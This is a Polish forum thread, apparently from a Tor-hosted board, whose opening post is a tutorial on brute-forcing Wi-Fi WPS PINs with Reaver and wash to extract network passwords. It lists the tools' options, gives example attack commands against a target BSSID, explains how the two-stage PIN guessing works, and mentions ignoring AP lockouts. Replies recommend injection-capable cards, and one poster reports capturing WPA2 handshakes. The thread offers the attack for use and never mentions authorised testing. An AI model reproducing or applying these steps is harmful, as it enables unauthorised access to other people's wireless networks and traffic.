1

Temat: [TuT z Torepublic]WPS - Wyciąganie pinu programem Raven Wi-Fi - Linux

Reaver jest programem wykorzystującym metode  brute force do łamania  WPS (Wifi Protected Setup) , w celu „wyjęcia” hasła z punktu dostępowego, zabezpieczającego   transmisje  danych na drodze AP-klient.  Średni czas złamania 8-cyfrowego kodu PIN, oraz uzyskania hasła zawiera się w granicach od 4 do 10 godzin. Do reaver-a dołaczony jest program o nazwie „wash”, dzieki któremu mamy możliwość  sprawdzenia, które AP są podatne na atak WPS.

Opcje programu „Wash v1.4″

Wymagane argumenty:

-i, –interface=<iface> Interfejs odpowiedzialny za przechwytywanie danych

-f, –file [FILE1 FILE2 FILE3 ...] Czytaj pakiety z plików

Opcjonalne argumenty:

-c, –channel=<num> Kanał nasłuchu [auto]

-o, –out-file=<file> Zapisz dane do pliku

-n, –probes=<num> Maksymalna liczba prób do wysłania do każdego AP w trybie skanowania [15]

-D, –daemonize Demonizuj wash

-C, –ignore-fcs Ignoruj błędy sumy kontrolnej ramek

-5, –5ghz Używaj kanałów częstotliwości 5GHz 802.11

-s, –scan Używaj trybu skan

-u, –survey Używaj trybu przeglądania  [domyślnie]

-h, –help Pokaz pomoc

Przykład zastosowania :

wash -i wlan18

http://torimagesbp2vt3u.onion/i/Jsif.png


Opcje programu „Reaver v1.4″

Wymagane argumenty:

-i, –interface=<wlan> Nazwa interfejsu w trybie nasłuchu

-b, –bssid=<mac> BSSID docelowego AP

Opcjonalne argumenty:

-m, –mac=<mac> MAC hosta

-e, –essid=<ssid> ESSID docelowego AP

-c, –channel=<channel> Ustaw 802.11 kanał dla interfejsu

-o, –out-file=<file> Wyślij log do pliku

-s, –session=<file> przywróć poprzednią sesje z pliku

-C, –exec=<command> Wykonaj podaną komendę z chwilą uzyskania PIN-u

-D, –daemonize „Demonizuj” reaver

-a, –auto Autodetekcja najlepszych opcji/ustawień dla docelowego AP

-f, –fixed Wyłącz „skakanie” po kanałach

-5, –5ghz Używaj kanałów częstotliwości 5GHz 802.11

-v, –verbose Wyświetlaj ostrzeżenia (-vv dla większej ilości)

-q, –quiet Tylko krytyczne wiadomości

-h, –help Pokaż pomoc

Opcje zaawansowane:

-p, –pin=<wps pin> Użyj 4 lub 8 liczbowego PIN-u WPS

-d, –delay=<seconds> Ustaw opóźnienie pomiędzy próbami

-l, –lock-delay=<seconds> Ustaw czas oczekiwania jeśli AP blokuje próby odgadnięcia PIN-u [60]

-g, –max-attempts=<num> Wyjdź po określonej ilości prób PIN

-x, –fail-wait=<seconds> Ustaw czas, po którym następuje  uśpienie, po 10 nieoczekiwanych niepowodzeniach

-r, –recurring-delay=<x:y> Spij przez y sekund każdej x próby PIN

-t, –timeout=<seconds> Ustaw czas do zakończenia

-T, –m57-timeout=<seconds> Ustaw czas zakończenia okresu M5/M7 [0.20]

-A, –no-associate Nie asocjuj z AP (asocjacja musi być wykonana przez inna aplikacje)

-N, –no-nacks Nie wysyłaj NACK jeżeli otrzymałeś pakiet „out-of-order” nie działa

-S, –dh-small Używaj małych kluczy DH w celu poprawy prędkości ataku

-L, –ignore-locks Ignoruj stan zablokowania zgłaszany przez docelowy AP

-E, –eap-terminate Zamykaj każdą sesję WPS po otrzymaniu nieprawidłowego pakietu EAP

-n, –nack Docelowy AP zawsze wysyła NACK [Auto]

-w, –win7 Mimic a Windows 7 registrar [False]

Przykład zastosowania:


reaver -i wlan18 -b 00:12:2A:6F:5D:D8 -c11 -v

http://torimagesbp2vt3u.onion/i/nhwC.png


reaver -i wlan18 -b 00:12:2A:6F:5D:D8 -c11 -vv -L -a

http://torimagesbp2vt3u.onion/i/fDVD.png


reaver -i wlan18 -b 00:12:2A:6F:5D:D8 -c11 -p 82487317

http://torimagesbp2vt3u.onion/i/iwiL.png


reaver -i wlan18 -b 00:12:2A:6F:5D:D8 -c11 -p 82487317 -vv

http://torimagesbp2vt3u.onion/i/ybQC.png


Łamanie kodu PIN odbywa się dwuetapowo. W pierwszym etapie sprawdzane są wszystkie kombinacje pierwszych 4 cyfr. Po odgadnięciu pierwszej części  pinu sprawdzana jest jego druga część, lecz są to tylko numery pasujące do sumy kontrolnej. Czas odgadnięcia drugiej części PIN jest zazwyczaj znacznie krótszy niż pierwszej.


Kompatybilność sterowników/kart Wi-fi z programem „Reaver v1.4″

Poprawnie działające sterowniki.

Poniższe sterowniki zostały przetestowane, oraz zgłoszone jako poprawnie działające z programem reaver:

    ath9k
    rtl8187
    carl19170
    ipw2000
    rt2800pci
    rt73usb

Częściowo działające sterowniki.

Poniższe sterowniki mogą nie działać prawidłowo z programem reaver, w zależności od  zastosowanej karty wi-fi:

    ath5k
    iwlan
    rtl2800usb
    b43

Nie działające sterowniki.

Poniższe sterowniki/karty zostały przetestowane, oraz zgłoszone jako niepoprawnie działające z programem reaver:

    iwl4965
    RT3070L
    Netgear WG111v3

Kilka tanich i dobrych kart do zabawy. Ewentualnie proszę o wpisy dotyczące używanych i polecanych przez was kart.

Edimax EW-7318USG -

Układ radiowy to Ralink RT2571WF (potocznie nazywany RT73USB albo poprostu RT73)
Wstrzykiwanie działa idealnie, zmienia MAC, posiada złącze RP-SMA, pracuje z każdą antena, ma przyzwoite 100mW i akceptowalną czułość. Działa na Windows XP/Vista/7, na każdym Linux-e od 2.6.19

Tonze UW-6200R/H -

Ma lepszą czułość od EW-7318USG i posiada układ Realtek RTL8187L

Tonze UW-6200C1 -

Jest o karta która wygląda i działa jak EW-7318USG tyle że według producenta posiada 200mW a nie 100mW.

Theta UN-100R -

Dobra i tania karta na RTL8187L, jest to układ który jest lepszy niż RT2571WF

WN321G -

To karta bez anteny, a więc ma dosyć przeciętny zasięg, można ją bez problemu przerobić na wersję z anteną na krótkim kablu, wtedy się nadaje.WN321G to dokładnie to samo to: Edimax EW-7318USG, Tonze UW-6200C1 różnica polega na braku wyjścia RP-SMA.

                                                                  
    Aby „reaver” działał poprawnie wymaga sygnału nie słabszego niż ok. -84 dbm.
    Poprawna praca „reaver-a” wymaga ustawienia karty w trybie nasłuchu (monitor mode)
     W praktyce występują AP, z których po odgadnięciu kodu PIN nie ma możliwości „wyjęcia” poprawnego hasła dostępu do sieci. Wykorzystując ten sam PIN reaver „wyjmuje” różne hasła będące długimi ciągami alfanumerycznymi.
    Należy zwrócić uwagę, że oprogramowanie niektórych AP posiada limit ilości prób możliwych do wykonania w określonym czasie. Po przekroczeniu danego limitu następuje blokada WPS uniemożliwiając nam dalszą kontynuacje ataku.

TuT z Torepublic by protektor

Szyfrowany PGP e-mail wymagany. Nie zajmuję się Escrow.
E-mail: [email protected] 0F3F 1DE0 E075 DE90 82AC 992F 86F1 CF79 7DD8 EC47
Bitmessage: BM-NC4NA5WTS5kCzGCkWMQUgQYdRudiCxXr

2

Odp: [TuT z Torepublic]WPS - Wyciąganie pinu programem Raven Wi-Fi - Linux

Wszystko super tylko ten TuT musiał być napisany dość dawno bo jedyne aktualnie dostępne karty to dwie od końca po reszcie nie ma śladu. Poleca ktoś jeszcze inne karty?

Fingerprint:5145 6F8E D1EE 47FF 78E7 CF3B 8E1C 46BB 7765 FF8D
Email: [email protected] (szyfruj wiadomości przez gpg)

3

Odp: [TuT z Torepublic]WPS - Wyciąganie pinu programem Raven Wi-Fi - Linux

Intel(R) Centrino(R) Advanced-N 6200 AGN

Działa bez problemu.

Trochę czytam,trochę wiem,jeszcze więcej chciałbym wiedzieć więc znowu więcej czytam smile

mail:[email protected]
jid:   [email protected]

4 Ostatnio edytowany przez KrzysiuToKolega (2016-12-30 PM)

Odp: [TuT z Torepublic]WPS - Wyciąganie pinu programem Raven Wi-Fi - Linux

Taaaa

EDIT: Ostatnią jeszcze idzie kupić big_smile słaby zasięg ale wszystko działa

Fingerprint:5145 6F8E D1EE 47FF 78E7 CF3B 8E1C 46BB 7765 FF8D
Email: [email protected] (szyfruj wiadomości przez gpg)

5

Odp: [TuT z Torepublic]WPS - Wyciąganie pinu programem Raven Wi-Fi - Linux

TP-Link TL-WN722N w marketach elektronicznych za 49 pln działa doskonale.

Kłopot w tym, że obecnie bardzo mało routerów jest podatnych na ataki WPS. Albo ja mam pecha i nie trafiłam nigdy na żaden podatny...

Waćpanna.

6

Odp: [TuT z Torepublic]WPS - Wyciąganie pinu programem Raven Wi-Fi - Linux

Dzięki że chciało ci się popatrzeć ale TL-WN722N nie jest kompatybilny z linuxem. (chyba że w wirtualnej maszynie na pc z windowsem)

Fingerprint:5145 6F8E D1EE 47FF 78E7 CF3B 8E1C 46BB 7765 FF8D
Email: [email protected] (szyfruj wiadomości przez gpg)

7

Odp: [TuT z Torepublic]WPS - Wyciąganie pinu programem Raven Wi-Fi - Linux

KrzysiuToKolega napisał/a:

Dzięki że chciało ci się popatrzeć ale TL-WN722N nie jest kompatybilny z linuxem. (chyba że w wirtualnej maszynie na pc z windowsem)

Jak to nie jest, używam codziennie z Kali Linuxem zainstalowanym natywnie na laptopie (bez żadnych wirtualek) i działa bez żadnych sterowników wprost po wyjęciu z pudełka. Wszystkie handshake WPA2 które zdobyłam były właśnie z tej karty.

Gdybym nie była pewna że działa i nie testowała, to bym nie pisała.

Waćpanna.

8

Odp: [TuT z Torepublic]WPS - Wyciąganie pinu programem Raven Wi-Fi - Linux

Ech a ja kupiłem te kartę bo byłem w błędzie :C

Fingerprint:5145 6F8E D1EE 47FF 78E7 CF3B 8E1C 46BB 7765 FF8D
Email: [email protected] (szyfruj wiadomości przez gpg)